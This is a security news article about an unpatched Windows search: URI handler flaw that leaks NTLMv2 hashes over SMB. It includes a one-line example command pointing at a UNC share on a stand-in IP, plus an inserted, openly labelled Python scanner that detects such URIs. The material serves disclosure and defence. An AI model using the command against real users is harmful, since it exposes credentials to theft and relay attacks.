Unpatched Windows Search URI Vulnerability Lets Attackers Steal NTLMv2 Hashes

Cybersecurity researchers have disclosed an unpatched vulnerability that can expose users' NTLMv2 hashes to attackers. The issue, identified by Huntress, is closely related to the previously reported CVE-2026-33829 and lies in the search: URI handler.

Details of the Vulnerability

CVE-2026-33829 was a spoofing vulnerability associated with the Windows Snipping Tool’s ms-screensketch: URI handler, which Microsoft addressed in April 2026. The advisory from Microsoft highlighted that an attacker could trick a user into clicking a malicious link embedded in a webpage or email. If the user consented to launch the link, their computer would connect to an SMB server controlled by the attacker, thereby disclosing the user’s NTLMv2 hash. This hash could then be exploited for authentication purposes.

The core of the vulnerability lies in the Snipping Tool’s URI handler, which accepted a “filePath” parameter without proper validation. This flaw allowed the handler to reach out to any Universal Naming Convention (UNC) path provided, triggering NTLM authentication and revealing the victim’s Net-NTLMv2 hash.

The newly identified vulnerability operates similarly, utilizing “search:” and “crumb=location:” instead of “filePath.” An example command illustrating this is:

start "" "search:query=test&crumb=location:\\10.0.1.100\share"

According to Huntress researcher Andrew Schwartz, this new issue employs the same NTLM leakage mechanism, resulting in an identical Net-NTLMv2 leak, sharing the same prerequisites and receiving a Moderate severity rating. Notably, the use of a “crumb” parameter to extract the hash was previously documented by Varonis in February 2024.
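As an added illustration (not code from Huntress or from the article), the following Python scanner flags search: and ms-screensketch: URIs whose crumb=location: or filePath value is a UNC path, which is the pattern both handlers abuse; it is meant for triaging captured email bodies or proxy logs, and the sample lines it runs over are constructed.

```python
import re
from urllib.parse import unquote

# Constructed sample lines, as they might appear in an email body or proxy log.
SAMPLE_LINES = [
    'start "" "search:query=test&crumb=location:\\\\10.0.1.100\\share"',
    '<a href="search:query=invoice&crumb=location:%5C%5Cfiles.example.test%5Cdocs">open</a>',
    'search:query=test&crumb=location:C:\\Users\\Public',          # local path, benign
    'ms-screensketch:edit?filePath=%5C%5C198.51.100.7%5Cc$',      # constructed form
    'https://example.test/search?q=test',                         # not a handler URI
]

# Handler URI: scheme, then everything up to whitespace or a quote/tag delimiter.
URI_RE = re.compile(r'(search|ms-screensketch):([^\s"\'<>]+)', re.IGNORECASE)
# Parameter carrying the path: crumb=location: for search:, filePath= for ms-screensketch:.
PATH_PARAM_RE = re.compile(r'(?:crumb=location:|filePath=)([^&]+)', re.IGNORECASE)
# UNC path: leading \\ or // followed by the host name.
UNC_RE = re.compile(r'^(?:\\\\|//)([^\\/]+)')


def unc_targets(text):
    """Return (scheme, host) pairs for handler URIs whose path points at a UNC host."""
    hits = []
    for m in URI_RE.finditer(text):
        scheme, rest = m.group(1).lower(), unquote(m.group(2))  # undo %5C-style encoding
        param = PATH_PARAM_RE.search(rest)
        if not param:
            continue
        unc = UNC_RE.match(param.group(1))
        if unc:
            hits.append((scheme, unc.group(1)))
    return hits


if __name__ == "__main__":
    for scheme, host in unc_targets("\n".join(SAMPLE_LINES)):
        print(f"{scheme}: URI reaches out to UNC host {host}")
```

Each hit names the host the victim machine would authenticate to, which is the value to check against the allow-listed file servers before treating the message as malicious.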

Potential Risks and Recommendations

The implications of this vulnerability are serious, as a threat actor could utilize the captured hash to execute relay attacks, thereby gaining unauthorized access to deeper network layers. Following a responsible disclosure on April 15, 2026, Microsoft opted not to address the issue, stating that only vulnerabilities classified as Important or Critical would warrant a fix.

In light of the absence of a patch, cybersecurity experts recommend several precautionary measures:

  • Block outbound SMB traffic (TCP/445 and TCP/139) on hosts that do not require it.
  • Enforce SMB signing to prevent captured hashes from being relayed against internal services.
  • Disable NTLM authentication where feasible.

These steps can help mitigate the risks associated with this vulnerability until a formal resolution is provided.
